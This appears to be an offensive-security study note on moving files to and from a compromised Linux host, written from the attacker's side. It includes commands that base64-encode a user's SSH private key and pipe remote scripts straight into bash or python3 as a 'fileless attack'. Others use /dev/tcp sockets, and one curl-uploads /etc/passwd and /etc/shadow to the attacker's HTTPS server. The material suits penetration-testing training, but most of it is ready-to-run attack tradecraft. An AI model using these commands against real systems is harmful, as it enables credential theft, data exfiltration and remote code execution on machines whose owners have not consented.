Linux File Transfer Methods

Base64 encoding

This is helpful in scenarios like copying the ssh key of a user to our local machine.

victim@target$ cat id_rsa |base64 -w 0;echo
#Now we decode the data on the other machine:
victim@target$ echo -n "encoded string" | base64 -d > id_rsa

to verify if the transfer was indeed successful we could check the md5 hashes on the two machines:

attack@attack$md5sum id_rsa

cURL / wget

$wget <url> -O output_filename
$curl <url> -o output_filename

We could turn the functioning of pipes to our advantage to make a fileless attack.

victim@target$wget -q0- <url-to-a-bash-script> | bash
victim@target$curl  <url-to-a-python-script> | python3

The -qO- option is necessary for wget to function correctly because if not specified, it will indeed download the file.

- stands for STDOUT which is then piped directly to the python interpreter.

Download with Bash (/dev/tcp)

We should start a listener on a machine (our host or the target's) then use the built-in /dev/TCP device file to open a connection.

attack@attack$nc -nlvp <port>

victim@target$exec 3<>/dev/tcp/machine-to-connect-to/port
victom@target$echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3
victim@target$cat <&3 > LinEnum.sh # Reads from FD3 and saves it to LinEnum.sh

Or you could upload the file from your machine using:

target@target$nc -lvp 4444 > file_on_target

attack@attack$exec 3<>/dev/tcp/target-ip/port
attack@attack$cat my_file >&3

And finally to close the connection:

victim@target$exec 3<&- 3>&-

In conclusion, the /dev/tcp/hostname/ip is our go-to if the wget, cURL or any other method can't work since it might be already compiled (it is by default as long as bash is v2.04 or greater).

The idea is to

• open a listener on a machine (target or attacking host)

• launch a connection with the built-in dev file from the other.

• Use a GET request or cat command and then redirect it to the FD... It all depends on the need and the method available since inbound or outbound connections could be denied and restricted.

About the 3<> part of the command :

• 3 refers to the file descriptor number. In Unix-like systems, file descriptors are used to manage input/output streams. File descriptors 0, 1, and 2 correspond to standard input, output, and error, respectively. The number 3 is chosen here to create a new file descriptor for the TCP connection.

• The <> syntax means "open for reading and writing." This opens the file descriptor 3 as both readable and writable, allowing you to send data to and receive data from the remote server.

SSH-SCP

SCP (secure copy) is a command-line utility that allows you to copy files and directories between two hosts securely. We can copy our files from local to remote servers and from remote servers to our local machine.

SCP is very similar to copy or cp, but instead of providing a local path, we need to specify a username, the remote IP address or DNS name, and the user's credentials.

Before using scp, we must start ssh:

# Running ssh
$sudo systemctl start ssh
$netstat -lnpt

# scp for Downloads:
$scp username@remote_host:/path/to/remote/file /path/to/local/directory

# scp for Uploads:
$scp /path/to/local/file username@remote_host:/path/to/remote/directory

Web Uploads

HTTPS python server

The idea of this part is hosting a web server on our attacking machine and upload the wanted files from the target host. For this we'll need the uploadserver module.

# Installation
attack@attack$sudo python3 -m pip install --user uploadserver

# Creating a Self-Signed certificate for the HTTPS protocol
attack@attack$openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'

# Setting up and running the server
attack@attack$mkdir https && cd https
attack@attack$sudo python3 -m uploadserver 443 --server-certificate ~/server.pem
File upload available at /upload
Serving HTTPS on 0.0.0.0 port 443 (https://0.0.0.0:443/) ...

# Starting the upload from the compromised machine
victim@target$curl -X POST https://attacking_IP/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure

The --insecure option is necessary since we used a Self-Signed certificate.

Simple HTTP servers

Depending on what's installed on the compromised machine, we can run a HTTP server using one of these commands:

# 1. Python
victim@target$python3 -m http.server

    Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

victim@target$python2.7 -m SimpleHTTPServer

    Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

# 2. PHP
victim@target$php -S 0.0.0.0:8000

    [Fri May 20 08:16:47 2022] PHP 7.4.28 Development Server (http://0.0.0.0:8000) started

# 3.Ruby
victim@target$ruby -run -ehttpd . -p8000

    [2022-05-23 09:35:46] INFO  WEBrick 1.6.1
    [2022-05-23 09:35:46] INFO  ruby 2.7.4 (2021-07-07) [x86_64-linux-gnu]
    [2022-05-23 09:35:46] INFO  WEBrick::HTTPServer#start: pid=1705 port=8000

After running one of these one-liners, we can then download the files we prefer using a simple wget command:

attack@attacl$wget target_ip:port/filetotransfer.txt